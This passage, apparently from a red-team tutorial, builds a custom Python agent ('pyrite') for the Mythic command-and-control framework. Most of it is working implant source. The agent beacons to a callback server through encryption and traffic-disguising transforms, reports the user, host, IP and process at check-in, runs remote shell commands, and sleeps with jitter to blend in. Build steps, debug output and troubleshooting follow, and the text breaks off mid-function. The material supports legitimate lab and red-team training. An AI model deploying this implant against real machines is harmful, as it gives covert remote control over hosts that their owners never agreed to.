    if not _hmac_mod.compare_digest(mac, expected):
        raise ValueError("HMAC verification failed: message may be tampered or key is wrong")
    if _CRYPTO_LIB == "pycryptodome":
        cipher = _AES.new(key, _AES.MODE_CBC, iv)
        padded = cipher.decrypt(ciphertext)
        return _unpad(padded, 16)
    elif _CRYPTO_LIB == "cryptography":
        cipher = _Cipher(_AESAlgo(key), _CBC(iv))
        decryptor = cipher.decryptor()
        padded = decryptor.update(ciphertext) + decryptor.finalize()
        unpadder = _padding.PKCS7(128).unpadder()
        return unpadder.update(padded) + unpadder.finalize()
    else:
        raise RuntimeError("No AES library available. Install pycryptodome.")
# ─────────────────────────────────────────────────────────────────────────────
# Transform Pipeline
# ─────────────────────────────────────────────────────────────────────────────
def apply_transforms(data: bytes, transforms: list) -> bytes:
    """
    Apply a list of transforms in order to data before sending.
    Each transform is {"action": "...", "value": "..."}.
    Available actions per the httpx README:
    base64, base64url, xor, prepend, append, netbios, netbiosu
    """
    for t in transforms:
        action = t.get("action", "")
        value = t.get("value", "")
        if action == "base64":
            data = base64.b64encode(data)
        elif action == "base64url":
            # Keep '=' padding: the httpx Go container uses base64.URLEncoding
            # which requires padding. Stripping '=' causes "illegal base64 data"
            # errors when the encoded length is not a multiple of 4.
            data = base64.urlsafe_b64encode(data)
        elif action == "prepend":
            data = value.encode("utf-8") + data
        elif action == "append":
            data = data + value.encode("utf-8")
        elif action == "xor":
            key = value.encode("utf-8")
            data = bytes(b ^ key[i % len(key)] for i, b in enumerate(data))
        elif action == "netbios":
            result = b""
            for byte in data:
                result += bytes([ord('a') + (byte >> 4), ord('a') + (byte & 0xf)])
            data = result
        elif action == "netbiosu":
            result = b""
            for byte in data:
                result += bytes([ord('A') + (byte >> 4), ord('A') + (byte & 0xf)])
            data = result
    return data
def reverse_transforms(data: bytes, transforms: list) -> bytes:
    """
    Reverse a list of transforms in reverse order to decode a server response.
    """
    for t in reversed(transforms):
        action = t.get("action", "")
        value = t.get("value", "")
        if action == "base64":
            data = base64.b64decode(data)
        elif action == "base64url":
            pad = (4 - len(data) % 4) % 4
            data = base64.urlsafe_b64decode(data + b"=" * pad)
        elif action == "prepend":
            data = data[len(value.encode("utf-8")):]
        elif action == "append":
            # Slice by explicit end index: data[:-0] would return b"" and
            # wipe the whole message when the append value is empty.
            data = data[:len(data) - len(value.encode("utf-8"))]
        elif action == "xor":
            key = value.encode("utf-8")
            data = bytes(b ^ key[i % len(key)] for i, b in enumerate(data))
        elif action in ("netbios", "netbiosu"):
            result = b""
            base = ord('a') if action == "netbios" else ord('A')
            for i in range(0, len(data), 2):
                high = data[i] - base
                low = data[i + 1] - base
                result += bytes([(high << 4) | low])
            data = result
    return data
# ─────────────────────────────────────────────────────────────────────────────
# HTTP Transport
# ─────────────────────────────────────────────────────────────────────────────
def _place_message(method: str, url: str, encoded: bytes,
                   msg_loc: str, msg_name: str, extra_headers: dict) -> bytes:
    """
    Send the encoded message using the HTTP method, URL, and placement
    location specified in the profile config.
    Returns the raw response bytes.
    """
    headers = dict(extra_headers)
    if not requests:
        # urllib fallback: body placement only. Fail loudly instead of
        # silently sending a body the profile does not expect.
        if msg_loc != "body":
            raise ValueError(f"urllib fallback cannot place message in: {msg_loc}")
        import ssl
        # Mirror verify=False from the requests path (self-signed lab certs)
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
        req = urllib.request.Request(
            url, data=encoded, headers=headers, method=method
        )
        with urllib.request.urlopen(req, timeout=30, context=ctx) as r:
            return r.read()
    kwargs = {"headers": headers, "verify": False, "timeout": 30}
    if msg_loc == "body":
        kwargs["data"] = encoded
    elif msg_loc == "query":
        # Build the URL manually to avoid requests URL-encoding the value.
        # requests' params= dict would encode '+' as '%2B', breaking base64
        # in the query string. Our encoded value is already URL-safe (the
        # profile should use base64url for query placement, not base64).
        sep = "&" if "?" in url else "?"
        url = f"{url}{sep}{msg_name}={encoded.decode('utf-8')}"
    elif msg_loc == "header":
        headers[msg_name] = encoded.decode("utf-8")
    elif msg_loc == "cookie":
        kwargs["cookies"] = {msg_name: encoded.decode("utf-8")}
    else:
        raise ValueError(f"Unknown message location: {msg_loc}")
    # requests.request() handles GET and POST with the same arguments
    r = requests.request(method, url, **kwargs)
    return r.content
def send_message(uuid_str: str, payload: dict, use_get: bool = False,
                 override_key: str = None) -> dict:
    """
    Full send/receive cycle. Encrypts with SESSION_KEY if established (post-EKE),
    falls back to AESPSK (staging phase), then plaintext.
    override_key allows staging to specify which key to use explicitly.
    """
    active_key = override_key or SESSION_KEY or AESPSK
    json_body = json.dumps(payload).encode("utf-8")
    if active_key:
        body = mythic_encrypt(json_body, active_key)
    else:
        body = json_body
    raw = uuid_str.encode("utf-8") + body
    wire = base64.b64encode(raw)
    if use_get:
        encoded = apply_transforms(wire, GET_TRANSFORMS)
        url = f"{BASE_URL}{random.choice(GET_URIS)}"
        method = "GET"
        msg_loc, msg_name, hdrs = GET_MSG_LOC, GET_MSG_NAME, GET_HDRS
        s_xforms = GET_SERVER_TRANSFORMS
    else:
        encoded = apply_transforms(wire, POST_TRANSFORMS)
        url = f"{BASE_URL}{random.choice(POST_URIS)}"
        method = "POST"
        msg_loc, msg_name, hdrs = POST_MSG_LOC, POST_MSG_NAME, POST_HDRS
        s_xforms = POST_SERVER_TRANSFORMS
    # ── DEBUG ─────────────────────────────────────────────────────────────────
    key_label = (
        f"EKE session ({SESSION_KEY[:16]}...)" if SESSION_KEY and not override_key else
        f"override key ({override_key[:16]}...)" if override_key else
        f"static PSK ({AESPSK[:16]}...)" if AESPSK else
        "plaintext"
    )
    print(f"\n[DEBUG] OUTGOING ({method} {url})")
    print(f" action : {payload.get('action', '?')}")
    print(f" outer UUID: {uuid_str}")
    print(f" key used : {key_label}")
    print(f" raw[:60] : {raw[:60]}...")
    print(f" wire[:60] : {wire[:60]}...")
    print(f" encoded head (20): {encoded[:20]}")
    print(f" encoded tail (20): {encoded[-20:]}", flush=True)
    # ── END DEBUG ─────────────────────────────────────────────────────────────
    raw_resp = _place_message(method, url, encoded, msg_loc, msg_name, hdrs)
    decoded = reverse_transforms(raw_resp, s_xforms)
    print(f"[DEBUG] INCOMING: {raw_resp[:60]}...", flush=True)
    unwrapped = base64.b64decode(decoded + b'====')
    resp_body = unwrapped[36:]
    if not resp_body:
        raise RuntimeError(
            f"Empty response body from {url}. Check C2 container logs: "
            "sudo ./mythic-cli logs httpx"
        )
    if active_key:
        resp_body = mythic_decrypt(resp_body, active_key)
    return json.loads(resp_body)
# ─────────────────────────────────────────────────────────────────────────────
# Kill Date
# ─────────────────────────────────────────────────────────────────────────────
def check_kill_date() -> None:
    if not KILL_DATE_STR:
        return
    try:
        if datetime.date.today() >= datetime.date.fromisoformat(KILL_DATE_STR):
            os._exit(0)
    except ValueError:
        pass
# ─────────────────────────────────────────────────────────────────────────────
# EKE Staging + Checkin
# ─────────────────────────────────────────────────────────────────────────────
def get_ip() -> str:
    try:
        return socket.gethostbyname(socket.gethostname())
    except Exception:
        return "127.0.0.1"


def _gen_session_id(length: int = 20) -> str:
    import string
    chars = string.ascii_letters + string.digits
    return "".join(random.choice(chars) for _ in range(length))


def do_staging_rsa() -> tuple:
    """
    Perform RSA-based Encrypted Key Exchange with Mythic.

    Per the Mythic checkin docs:
    https://docs.mythic-c2.net/customizing/payload-type-development/create_tasking/agent-side-coding/initial-checkin#eke-by-generating-client-side-rsa-keys

    Phase 1: Agent sends to Mythic (encrypted with static AESPSK):
        Base64( PayloadUUID + AES256(AESPSK, {"action":"staging_rsa",
            "pub_key":"<b64 RSA PEM>", "session_id":"<20char>"}) )

    Phase 1: Mythic responds (encrypted with static AESPSK):
        Base64( PayloadUUID + AES256(AESPSK, {"action":"staging_rsa",
            "uuid":"<tempUUID>",
            "session_key":"<RSAPub(new_aes_key)>",
            "session_id":"<same 20char>"}) )

    RSA details from docs: 4096-bit, PKCS1_OAEP with SHA1.

    Returns (tempUUID, session_key_b64) for use in the subsequent checkin.
    Sets SESSION_KEY global.
    """
    global SESSION_KEY
    from Crypto.PublicKey import RSA
    from Crypto.Cipher import PKCS1_OAEP
    from Crypto.Hash import SHA1

    rsa_key = RSA.generate(4096)
    pub_pem_b64 = base64.b64encode(
        rsa_key.publickey().export_key("PEM")
    ).decode("utf-8")
    session_id = _gen_session_id(20)
    staging_msg = {
        "action": "staging_rsa",
        "pub_key": pub_pem_b64,
        "session_id": session_id,
    }
    # Send staging_rsa encrypted with static AESPSK using PAYLOAD_UUID
    response = send_message(PAYLOAD_UUID, staging_msg, use_get=False,
                            override_key=AESPSK)
    if response.get("action") != "staging_rsa":
        raise RuntimeError(f"Unexpected staging response: {response.get('action')}")
    if response.get("session_id") != session_id:
        raise RuntimeError("Session ID mismatch in staging response")
    temp_uuid = response["uuid"]
    session_key_enc = base64.b64decode(response["session_key"])
    # Decrypt session key with our RSA private key
    # Per Mythic docs: PKCS1_OAEP with SHA1, 4096-bit
    cipher_rsa = PKCS1_OAEP.new(rsa_key, hashAlgo=SHA1)
    session_key = cipher_rsa.decrypt(session_key_enc)
    SESSION_KEY = base64.b64encode(session_key).decode("utf-8")
    return temp_uuid, SESSION_KEY
def debug_startup() -> None:
    """
    Print stamped-in configuration at startup so the operator can immediately
    confirm what the builder produced (crypto mode, callback target, profile
    values) before any network activity happens.
    """
    print("\n" + "=" * 60)
    print("[DEBUG] PYRITE STARTUP CONFIGURATION")
    print("=" * 60)
    print(f" Callback: {BASE_URL}")
    print(f" Payload UUID: {PAYLOAD_UUID}")
    print(f" Interval: {CALLBACK_INTERVAL}s Jitter: {CALLBACK_JITTER}%")
    print(f" Kill date: {KILL_DATE_STR or '(none)'}")
    print()
    if AESPSK and USE_EKE:
        print(f" AESPSK: {AESPSK[:20]}...")
        print(f" USE_EKE: True")
        print(f" Crypto mode: EKE — staging_rsa exchange with AESPSK,")
        print(f" then per-session key negotiated via RSA")
    elif AESPSK:
        print(f" AESPSK: {AESPSK[:20]}...")
        print(f" USE_EKE: False")
        print(f" Crypto mode: Static PSK — AESPSK used directly for all traffic")
    else:
        print(f" AESPSK: (not set)")
        print(f" USE_EKE: False")
        print(f" Crypto mode: Plaintext — no encryption")
    print()
    print(f" POST URIs: {POST_URIS}")
    print(f" POST location: {POST_MSG_LOC}" + (f" name={POST_MSG_NAME!r}" if POST_MSG_NAME else ""))
    print(f" POST xforms: {[t['action'] for t in POST_TRANSFORMS] or '(none)'}")
    print(f" GET URIs: {GET_URIS}")
    print(f" GET location: {GET_MSG_LOC}" + (f" name={GET_MSG_NAME!r}" if GET_MSG_NAME else ""))
    print(f" GET xforms: {[t['action'] for t in GET_TRANSFORMS] or '(none)'}")
    print("=" * 60 + "\n", flush=True)
def do_checkin() -> str:
    """
    Perform the full checkin sequence and return the callbackUUID.

    Branches on USE_EKE and AESPSK, both stamped in at build time:
        USE_EKE=True               → staging_rsa exchange (AESPSK) → session key → checkin
        USE_EKE=False, AESPSK set  → static PSK checkin directly with PAYLOAD_UUID
        USE_EKE=False, no AESPSK   → plaintext checkin with PAYLOAD_UUID

    All post-checkin messages use CALLBACK_UUID + SESSION_KEY (EKE),
    CALLBACK_UUID + AESPSK (static PSK), or CALLBACK_UUID plaintext.
    """
    arch = "x64" if sys.maxsize > 2**32 else "x86"
    try:
        user = os.getlogin()
    except Exception:
        user = os.environ.get("USER", os.environ.get("USERNAME", "unknown"))
    checkin_data = {
        "action": "checkin",
        "ip": get_ip(),
        "os": platform.platform(),
        "user": user,
        "host": socket.gethostname(),
        "pid": os.getpid(),
        "uuid": PAYLOAD_UUID,
        "architecture": arch,
        "domain": "",
        "integrity_level": 2,
        "external_ip": "",
        "encryption_key": "",
        "decryption_key": "",
    }
    if USE_EKE:
        print(f"[DEBUG] CHECKIN: EKE mode")
        print(f"[DEBUG] Phase 1 — staging_rsa (key: AESPSK {AESPSK[:16]}...)")
        temp_uuid, session_key = do_staging_rsa()
        print(f"[DEBUG] staging_rsa OK")
        print(f"[DEBUG] tempUUID: {temp_uuid}")
        print(f"[DEBUG] SESSION_KEY: {session_key[:16]}... (negotiated at runtime, not in binary)")
        print(f"[DEBUG] Phase 2 — checkin (outer UUID: tempUUID, key: SESSION_KEY)")
        response = send_message(temp_uuid, checkin_data, use_get=False)
    elif AESPSK:
        print(f"[DEBUG] CHECKIN: Static PSK mode (key: {AESPSK[:16]}...)")
        response = send_message(PAYLOAD_UUID, checkin_data, use_get=False)
    else:
        print(f"[DEBUG] CHECKIN: Plaintext mode")
        response = send_message(PAYLOAD_UUID, checkin_data, use_get=False)
    if response.get("status") == "success":
        callback_uuid = response["id"]
        post_checkin_key = (
            "SESSION_KEY" if SESSION_KEY else
            "AESPSK" if AESPSK else
            "plaintext"
        )
        print(f"[DEBUG] CHECKIN OK — callbackUUID: {callback_uuid}")
        print(f"[DEBUG] All subsequent messages: {callback_uuid} + {post_checkin_key}", flush=True)
        return callback_uuid
    raise RuntimeError(f"Checkin failed: {response}")
# ─────────────────────────────────────────────────────────────────────────────
# Task Loop — Batched
# ─────────────────────────────────────────────────────────────────────────────
def queue_response(task_id: str, output: str,
                   completed: bool = True, status: str = "success") -> None:
    """
    Queue a task response to be sent on the next get_tasking call.

    Per the Mythic get_tasking docs, responses can be included directly
    in the get_tasking message rather than requiring a separate post_response,
    halving the number of round trips per sleep interval.
    """
    _pending_responses.append({
        "task_id": task_id,
        "user_output": output,
        "completed": completed,
        "status": status,
    })


def queue_error(task_id: str, error_msg: str) -> None:
    # Per the post_response docs, status strings starting with "error:"
    # turn the status label red in the Mythic UI.
    queue_response(task_id, error_msg, completed=True,
                   status="error: " + error_msg)
def get_tasking() -> list:
    """
    Poll for all pending tasks and include any queued responses from the
    previous execution cycle in the same request.

    Per the Mythic get_tasking docs:
        tasking_size: -1 means return all pending tasks
        responses key allows piggybacking results onto the tasking request
    """
    global _pending_responses
    msg = {
        "action": "get_tasking",
        "tasking_size": -1,
    }
    # Detach the queue for this request. It is restored below if the send
    # fails, so results are not lost on a dropped beacon.
    in_flight, _pending_responses = _pending_responses, []
    if in_flight:
        msg["responses"] = in_flight
    # Use the GET verb for get_tasking only if the profile defines GET URIs
    # that differ from the POST URIs (and are not just "/"). Otherwise use POST.
    use_get = (bool(GET_URIS) and GET_URIS != ["/"]
               and set(GET_URIS) != set(POST_URIS))
    try:
        reply = send_message(CALLBACK_UUID, msg, use_get=use_get)
    except Exception:
        _pending_responses = in_flight + _pending_responses
        raise
    return reply.get("tasks", [])
# ─────────────────────────────────────────────────────────────────────────────
# Command Dispatch
# ─────────────────────────────────────────────────────────────────────────────
# ##COMMAND_CODE_INSERT##
COMMAND_MAP = {
    "shell": execute_shell,
    "exit": execute_exit,
}


def dispatch_task(task: dict) -> None:
    task_id = task["id"]
    command = task["command"]
    raw_params = task.get("parameters", "")
    # Per the Mythic get_tasking docs, parameters is always a JSON string
    try:
        parsed = json.loads(raw_params) if raw_params else {}
    except json.JSONDecodeError:
        queue_error(task_id, f"Failed to parse task parameters: {raw_params!r}")
        return
    handler = COMMAND_MAP.get(command)
    if handler is None:
        queue_error(task_id, f"Unknown command: {command}")
        return
    try:
        if command == "exit":
            queue_response(task_id, "Exiting.")
            # Flush queued responses before exiting: os._exit() is immediate
            if _pending_responses:
                send_message(CALLBACK_UUID, {
                    "action": "post_response",
                    "responses": _pending_responses,
                }, use_get=False)
            handler()
        else:
            queue_response(task_id, handler(parsed.get("command", "")))
    except Exception:
        queue_error(task_id, traceback.format_exc())
# ─────────────────────────────────────────────────────────────────────────────
# Sleep with Jitter
# ─────────────────────────────────────────────────────────────────────────────
def sleep_with_jitter(base_seconds: int, jitter_pct: int) -> None:
    # Sleep for base_seconds +/- jitter_pct percent, never less than 0.5s
    jitter_range = base_seconds * (jitter_pct / 100.0)
    actual = base_seconds + random.uniform(-jitter_range, jitter_range)
    time.sleep(max(actual, 0.5))
# ─────────────────────────────────────────────────────────────────────────────
# Main Loop
# ─────────────────────────────────────────────────────────────────────────────
def main():
    global CALLBACK_UUID
    debug_startup()
    check_kill_date()
    # Retry checkin until it succeeds
    while True:
        try:
            CALLBACK_UUID = do_checkin()
            break
        except Exception as e:
            print(f"[ERROR] Checkin failed: {e}", flush=True)
            traceback.print_exc()
            time.sleep(CALLBACK_INTERVAL)
    # Beacon loop: fetch all pending tasks, run them, sleep
    while True:
        check_kill_date()
        try:
            tasks = get_tasking()
            for task in tasks:
                dispatch_task(task)
        except Exception as e:
            print(f"[ERROR] Task loop: {e}", flush=True)
        sleep_with_jitter(CALLBACK_INTERVAL, CALLBACK_JITTER)


if __name__ == "__main__":
    main()
7. Generating an httpx Payload
- Edit pyrite_httpx.json as needed. The callback host and port are set in the UI fields, not in the file.
- In Mythic UI → Payloads → Generate New Payload
- Select pyrite, then select httpx as the C2 profile
- Upload pyrite_httpx.json when prompted for the profile config. This is required: a missing or malformed file produces "Missing name for agent variation".
- Fill in callback host, port, interval, jitter, and killdate in the remaining UI fields
For lab use, keep the callback host as http://. Mythic-layer AES-256 encryption via mythic_encrypts = True protects message content regardless of whether transport TLS is used. Transport TLS requires the httpx server container to be configured with a certificate; refer to the httpx repository for that configuration.
8. Verifying the Changes
8.1 Debug Instrumentation
Add a debug_startup() call at the top of main() to print the stamped-in configuration before any network activity, so you can confirm what the builder produced:
def debug_startup() -> None:
    """Print stamped-in configuration so the operator can confirm what was built."""
    print("\n" + "="*60)
    print("[DEBUG] PYRITE STARTUP CONFIGURATION")
    print("="*60)
    print(f" Callback: {BASE_URL}")
    print(f" Payload UUID: {PAYLOAD_UUID}")
    print(f" Kill date: {KILL_DATE_STR or '(none)'}")
    print()
    print(f" AESPSK set: {'YES — ' + AESPSK[:16] + '...' if AESPSK else 'NO (plaintext mode)'}")
    print(f" USE_EKE: {USE_EKE}")
    if AESPSK and USE_EKE:
        print(f" Crypto mode: EKE — staging_rsa exchange, then per-session key")
    elif AESPSK:
        print(f" Crypto mode: Static PSK — AESPSK used for all traffic")
    else:
        print(f" Crypto mode: Plaintext — no encryption")
    print()
    print(f" POST URIs: {POST_URIS}")
    print(f" POST msg loc: {POST_MSG_LOC}" + (f" name={POST_MSG_NAME!r}" if POST_MSG_NAME else ""))
    print(f" POST transforms:{[t['action'] for t in POST_TRANSFORMS] or '(none)'}")
    print(f" GET URIs: {GET_URIS}")
    print(f" GET msg loc: {GET_MSG_LOC}" + (f" name={GET_MSG_NAME!r}" if GET_MSG_NAME else ""))
    print(f" GET transforms: {[t['action'] for t in GET_TRANSFORMS] or '(none)'}")
    print("="*60 + "\n")
Add a debug version of do_checkin that shows the EKE stages as they happen:
def do_checkin() -> str:
    arch = "x64" if sys.maxsize > 2**32 else "x86"
    try:
        user = os.getlogin()
    except Exception:
        user = os.environ.get("USER", os.environ.get("USERNAME", "unknown"))
    checkin_data = {
        "action": "checkin",
        "ip": get_ip(),
        "os": platform.platform(),
        "user": user,
        "host": socket.gethostname(),
        "pid": os.getpid(),
        "uuid": PAYLOAD_UUID,
        "architecture": arch,
        "domain": "",
        "integrity_level": 2,
        "external_ip": "",
        "encryption_key": "",
        "decryption_key": "",
    }
    if USE_EKE:
        print("[DEBUG] CHECKIN MODE: EKE")
        print(f"[DEBUG] Step 1: staging_rsa exchange using static AESPSK ({AESPSK[:16]}...)")
        temp_uuid, session_key = do_staging_rsa()
        print(f"[DEBUG] staging_rsa complete")
        print(f"[DEBUG] tempUUID: {temp_uuid}")
        print(f"[DEBUG] SESSION_KEY: {session_key[:16]}... (negotiated, not in binary)")
        print(f"[DEBUG] Step 2: checkin using tempUUID + SESSION_KEY")
        response = send_message(temp_uuid, checkin_data, use_get=False)
    elif AESPSK:
        print(f"[DEBUG] CHECKIN MODE: Static PSK ({AESPSK[:16]}...)")
        response = send_message(PAYLOAD_UUID, checkin_data, use_get=False)
    else:
        print("[DEBUG] CHECKIN MODE: Plaintext")
        response = send_message(PAYLOAD_UUID, checkin_data, use_get=False)
    if response.get("status") == "success":
        callback_uuid = response["id"]
        print(f"[DEBUG] CHECKIN SUCCESS")
        print(f"[DEBUG] callbackUUID: {callback_uuid}")
        print(f"[DEBUG] All subsequent messages will use this UUID"
              + (" + SESSION_KEY" if SESSION_KEY else " + AESPSK" if AESPSK else " (plaintext)"))
        return callback_uuid
    raise RuntimeError(f"Checkin failed: {response}")
And the debug send_message which shows the active key at each call:
def send_message(uuid_str: str, payload: dict, use_get: bool = False,
                 override_key: str = None) -> dict:
    active_key = override_key or SESSION_KEY or AESPSK
    json_body = json.dumps(payload).encode("utf-8")
    if active_key:
        body = mythic_encrypt(json_body, active_key)
    else:
        body = json_body
    raw = uuid_str.encode("utf-8") + body
    wire = base64.b64encode(raw)
    if use_get:
        transforms = GET_TRANSFORMS
        server_transforms = GET_SERVER_TRANSFORMS
        url = f"{BASE_URL}{random.choice(GET_URIS)}"
        msg_loc = GET_MSG_LOC
        msg_name = GET_MSG_NAME
        headers = GET_HDRS
        method = "GET"
    else:
        transforms = POST_TRANSFORMS
        server_transforms = POST_SERVER_TRANSFORMS
        url = f"{BASE_URL}{random.choice(POST_URIS)}"
        msg_loc = POST_MSG_LOC
        msg_name = POST_MSG_NAME
        headers = POST_HDRS
        method = "POST"
    encoded = apply_transforms(wire, transforms)
    # ── DEBUG: print BEFORE sending (visible even if connection fails) ────────
    # Label the key that is actually in use (active_key), so the log always
    # matches the crypto applied. The staging call passes AESPSK as the
    # override, which is reported as the static PSK.
    key_label = (
        f"static PSK ({AESPSK[:16]}...)" if active_key and active_key == AESPSK else
        f"override ({override_key[:16]}...)" if override_key else
        f"EKE session ({SESSION_KEY[:16]}...)" if SESSION_KEY else
        "plaintext"
    )
    print(f"\n[DEBUG] OUTGOING ({method} {url})")
    print(f" outer UUID : {uuid_str}")
    print(f" action : {payload.get('action', '?')}")
    print(f" key used : {key_label}")
    print(f" raw before transforms : {raw[:80]}...")
    print(f" wire (base64) : {wire[:80]}...")
    print(f" after profile xforms : {encoded[:80]}...")
    print(f" encoded head (20) : {encoded[:20]}")
    print(f" encoded tail (20) : {encoded[-20:]}")
    print(f" placement : {msg_loc}" + (f" name={msg_name!r}" if msg_name else ""))
    raw_resp = _place_message(method, url, encoded, msg_loc, msg_name, headers)
    decoded = reverse_transforms(raw_resp, server_transforms)
    unwrapped = base64.b64decode(decoded + b'====')
    print(f"\n[DEBUG] INCOMING")
    print(f" raw server response : {raw_resp[:80]}...")
    print(f" after reverse xforms : {decoded[:80]}...")
    print(f" after base64 decode : {unwrapped[:80]}...")
    if active_key:
        print(f" body is : encrypted (will decrypt with {key_label})")
    else:
        print(f" body is : plaintext JSON")
    # ── END DEBUG ─────────────────────────────────────────────────────────────
    resp_body = unwrapped[36:]
    if not resp_body:
        raise RuntimeError("Empty response — check: sudo ./mythic-cli logs httpx")
    if active_key:
        resp_body = mythic_decrypt(resp_body, active_key)
    return json.loads(resp_body)
Update main() to call debug_startup():
def main():
    global CALLBACK_UUID
    debug_startup()  # ← print config before any network activity
    check_kill_date()
    ...
Example startup output for EKE mode (aes256_hmac + encrypted_exchange_check = true):
============================================================
[DEBUG] PYRITE STARTUP CONFIGURATION
============================================================
Callback: http://127.0.0.1:82
Payload UUID: bb0936fc-b373-462e-8548-52c9cd3614d6
Kill date: 2027-04-07
AESPSK set: YES — ppnuO/i7+EB2HVao...
USE_EKE: True
Crypto mode: EKE — staging_rsa exchange, then per-session key
POST URIs: ['/data']
POST msg loc: body
POST transforms:['base64']
GET URIs: ['/']
GET msg loc: body
GET transforms: ['base64']
============================================================
[DEBUG] CHECKIN MODE: EKE
[DEBUG] Step 1: staging_rsa exchange using static AESPSK (ppnuO/i7+EB2HVao...)
[DEBUG] OUTGOING (POST http://127.0.0.1:82/data)
outer UUID : bb0936fc-b373-462e-8548-52c9cd3614d6
action : staging_rsa
key used : static PSK (ppnuO/i7+EB2HVao...)
raw before transforms : b'bb0936fc-...<binary IV+cipher+HMAC>'...
wire (base64) : b'YmIwOTM2ZmMt...'...
after profile xforms : b'YmIwOTM2ZmMt...'...
placement : body
[DEBUG] INCOMING
...
body is : encrypted (will decrypt with static PSK)
[DEBUG] staging_rsa complete
[DEBUG] tempUUID: 303365-29d8-4d4c-...
[DEBUG] SESSION_KEY: Xgjq3vE9vduJliEd... (negotiated, not in binary)
[DEBUG] Step 2: checkin using tempUUID + SESSION_KEY
[DEBUG] OUTGOING (POST http://127.0.0.1:82/data)
outer UUID : 303365-29d8-4d4c-...
action : checkin
key used : EKE session (Xgjq3vE9vduJliEd...)
...
[DEBUG] CHECKIN SUCCESS
callbackUUID: 558b6c3-2a38-4dfe-...
All subsequent messages will use this UUID + SESSION_KEY
Example startup output for static PSK (aes256_hmac + encrypted_exchange_check = false):
AESPSK set: YES — ppnuO/i7+EB2HVao...
USE_EKE: False
Crypto mode: Static PSK — AESPSK used for all traffic
[DEBUG] CHECKIN MODE: Static PSK (ppnuO/i7+EB2HVao...)
[DEBUG] CHECKIN SUCCESS
callbackUUID: e02388c8-cee5-45db-...
All subsequent messages will use this UUID + AESPSK
Example startup output for plaintext (none):
AESPSK set: NO (plaintext mode)
USE_EKE: False
Crypto mode: Plaintext — no encryption
[DEBUG] CHECKIN MODE: Plaintext
[DEBUG] CHECKIN SUCCESS
callbackUUID: 9d22506b-2dd1-4aff-...
All subsequent messages will use this UUID (plaintext)
8.2 mythic_encrypts = False
With mythic_encrypts = False and no AESPSK stamped into the agent, active_key is empty, so send_message skips the mythic_encrypt/mythic_decrypt calls entirely and sends plaintext JSON, the same as Part 1. The httpx container forwards the bytes unchanged and Mythic processes them as plaintext. This requires the operator to select none for the AESPSK parameter; otherwise Mythic will try to decrypt the plaintext blob with the AES key and fail.
Using mythic_encrypts = False with custom crypto implemented in a translation container is covered in Part 3.
8.3 Functional Verification
Verify the profile is being honoured: With pyrite_httpx.json (body + base64), the agent should POST to /data. Change the profile to location: "query" with name: "filter", regenerate, and confirm the agent sends GET /...?filter=<encoded> instead. This confirms the builder is correctly reading and stamping the profile values.
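To make the location check concrete, here is a minimal sketch of how an encoded message could be placed according to the profile's location value. build_request is a hypothetical stand-in for the agent's _place_message, not its actual body, and percent-encoding the query value with urlencode is an assumption about what the httpx container accepts.

```python
import urllib.parse
import urllib.request


def build_request(method, url, encoded, location, name="", headers=None):
    """Return a urllib Request with `encoded` placed per the profile location.

    Hypothetical helper for illustration; the agent's real _place_message
    may differ in detail.
    """
    hdrs = dict(headers or {})
    data = None
    text = encoded.decode("ascii")
    if location == "body":
        data = encoded
    elif location == "query":
        # urlencode percent-encodes "+", "/" and "=" from base64 output
        sep = "&" if "?" in url else "?"
        url = f"{url}{sep}{urllib.parse.urlencode({name: text})}"
    elif location == "header":
        hdrs[name] = text
    elif location == "cookie":
        hdrs["Cookie"] = f"{name}={text}"
    else:
        raise ValueError(f"unsupported message location: {location!r}")
    return urllib.request.Request(url, data=data, headers=hdrs, method=method)


# Same message, two placements: only the request shape changes.
as_query = build_request("GET", "http://127.0.0.1:82/", b"QUJD", "query", "filter")
as_body = build_request("POST", "http://127.0.0.1:82/data", b"QUJD", "body")
print(as_query.get_method(), as_query.full_url)
print(as_body.get_method(), as_body.full_url, as_body.data)
```

Printing the request before sending it is a quick way to confirm that a regenerated payload picked up the new location and name values.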
Verify batched tasking: Queue three shell commands in the Mythic UI before the agent beacons. All three tasks should arrive in a single get_tasking response, and all three results should be piggybacked on the following beacon rather than sent in three separate round trips.
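The expected traffic pattern can be rehearsed offline. The sketch below simulates it with a stand-in server; FakeMythic and beacon are hypothetical names used only for this illustration, and the message fields mirror the ones used by get_tasking and queue_response in the agent.

```python
class FakeMythic:
    """Stand-in for the C2 endpoint: hands out every queued task at once."""

    def __init__(self, tasks):
        self.tasks = list(tasks)
        self.requests = []  # every message received, kept for inspection

    def send(self, msg):
        self.requests.append(msg)
        tasks, self.tasks = self.tasks, []
        return {"action": "get_tasking", "tasks": tasks}


def beacon(send, pending):
    """One beacon: request all tasks and piggyback any queued responses."""
    msg = {"action": "get_tasking", "tasking_size": -1}
    if pending:
        msg["responses"] = list(pending)
    return send(msg).get("tasks", [])


server = FakeMythic([{"id": f"t{i}", "command": "shell"} for i in range(3)])

tasks = beacon(server.send, [])  # beacon 1: receives all three tasks
pending = [
    {"task_id": t["id"], "user_output": "ok", "completed": True, "status": "success"}
    for t in tasks
]
beacon(server.send, pending)  # beacon 2: carries all three results

print(len(server.requests), len(server.requests[1]["responses"]))
```

Two requests carry three tasks and three results. With tasking_size: 1 and a separate post_response per task, the same work would take one request per task plus one per result.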
| Symptom | Likely cause |
|---|---|
| Profile generates but agent gets empty response | httpx container failed to load the profile config — check sudo ./mythic-cli logs httpx for Failed to read file from Mythic. Restart with sudo ./mythic-cli restart httpx |
| HMAC verification failed on checkin | Almost always caused by empty response body — fix the httpx container first |
| HTTP Error 404 on POST to /data | httpx container not running or profile config not loaded. Check logs and restart |
| Agent produces no output at all | Exception being swallowed — ensure main() prints exceptions. Usually a missing pycryptodome or connection refused |
| Command files duplicated in generated agent | Builder insertion marker appeared twice in template — ensure template uses # ##COMMAND_CODE_INSERT## exactly once |
| Port stamped as 80 despite specifying a different port | Domain regex failed to parse callback_domains — add debug print of callback_domains raw value in builder Step 2 |
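When chasing the HMAC row above, it can help to check a response body by hand before blaming the key. The following is a rough sketch using only the standard library. It assumes the body layout is a 16-byte IV, then ciphertext, then a 32-byte HMAC-SHA256 tag computed over IV + ciphertext with the base64-decoded AES key; verify that layout against your mythic_encrypt implementation before relying on it. check_body is a hypothetical helper name.

```python
import base64
import hashlib
import hmac

IV_LEN = 16    # AES block size
MAC_LEN = 32   # HMAC-SHA256 digest size
MIN_LEN = IV_LEN + 16 + MAC_LEN  # at least one ciphertext block


def check_body(body: bytes, key_b64: str):
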